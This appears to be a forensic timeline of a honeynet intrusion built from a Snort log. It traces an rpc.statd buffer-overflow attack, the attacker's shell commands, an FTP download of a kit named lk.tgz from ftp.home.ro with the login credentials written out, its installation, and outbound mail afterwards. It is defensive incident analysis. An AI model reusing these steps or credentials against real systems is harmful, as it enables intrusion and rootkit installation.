Timeline of the events took place, as recorded in the snort-0315@0005.log

Time (hh:mm:ss) Event
20:21:23 the host 211.185.125.124 performed a SYN scan on TCP port 111 of all hosts in this honeynet, and both 172.16.1.103 and 172.16.1.108 responded with a SYN-ACK
20:21:24 the host 211.185.125.124 sent a "RPC GETPORT Call" query to the host 172.16.1.103.
the host 172.16.1.103 replied with a "RPC GETPORT Reply" packet to the host 211.185.125.124 indicating its rpc.statd  is listening on UDP port 32773.
the host 211.185.125.124 sent a malformed STAT request to UDP port 32773 of the host 172.16.1.103
the host 172.16.1.103 replied to the STAT request sent by the host 211.185.125.124 and stated the request failed.
20:21:25 the host 211.185.125.124 send a "RPC GETPORT Call" query to the host 172.16.1.108.
the host 172.16.1.108 replied to the "RPC GETPORT Call" with a "RPC GETPORT Reply", telling the host 211.185.125.124 that its RPC port is listening on UDP port 931.
the host 211.185.125.124 sent a malformed STAT request to port 931 of the host 172.16.1.108 attempting to buffer-overflow rpc.statd.
20:21:26 the host 211.185.125.124 performed yet another SYN scan on TCP port 111, but this time, only those hosts that didn't respond previously were scanned.
20:2127 the host 211.185.125.124 sent yet another mal-formed STAT request to port 931 of the host 172.16.1.108 attempting to buffer-overflow rpc.statd.
20:21:29 the host 211.185.125.124 sent yet another mal-formed STAT request to port 931 of the host 172.16.1.108 attempting to buffer-overflow rpc.statd.
20:21:32 the host 211.185.125.124 performed an identical SYN scan as one launched at 20:21:26
20:21:36 this is when the cracker launched the actual TCP connection to port 39168 and executed the command "cd /; uname -a; id;".
20:36:04 the cracker executed the command "ftp -v ftp.home.ro".
20:36:05 ftp.home.ro performed an ident request to get list of who's currently logged on the host 172.16.1.108
20:36:07 ftp.home.ro performed another ident request to get list of who's currently logged on the host 172.16.1.108
20:36:08 ftp.home.ro prompted the cracker for user name for the FTP connection.
20:36:12 the cracker entered the user name "soane" as the login name for the FTP connection.
ftp.home.ro prompt the cracker for the password to the user name "soane".
20:36:16 the cracker entered the password "i2ttgcj1d".
20:36:20 the cracker executed the command "get lk.tgz".
20:36:21 ftp.home.ro acknowledge the command was entered successfully and initiated the download of the file lk.tgz.
20:36:57 the transfer of the file lk.tgz was completed.
20:40:55 the FTP connection to ftp.home.ro was terminated by ftp.home.ro since it has been idled for more than 240 seconds.
20:44:51 the cracker exits the FTP client application by executing the command "bye".
20:44:59 the cracker executed the command "tar -z xvf lk.tgz"
20:45:00 the extraction of the lk.tgz completed.
20:45:08 the cracker executed the command "cd last".
20:45:11 the cracker executed the command "./install"
20:45:14 the installation script completed
20:45:18 the cracker terminates its connection to the host 172.16.1.108.
20:46:15 the host 172.16.1.108 initiates a SMTP connection to mta502.mail.yahoo.com to deliver the mail message for bidi_damm@yahoo.com.
20:46:16 the said SMTP mail delivery was completed and the SMTP connection terminated.  The transcript of this delivery is attached.
20:46:24 the host 172.16.1.108 initiates a SMTP connection to spf2.us3.outblaze.com to deliver the mail message for last@linuxmail.org
20:46:25 the said SMTP mail delivery was aborted by the receiving host as it complained about the domain asdf1 (from the sender's email address root@asdf1) does not exist.  The transcript of this delivery is also attached.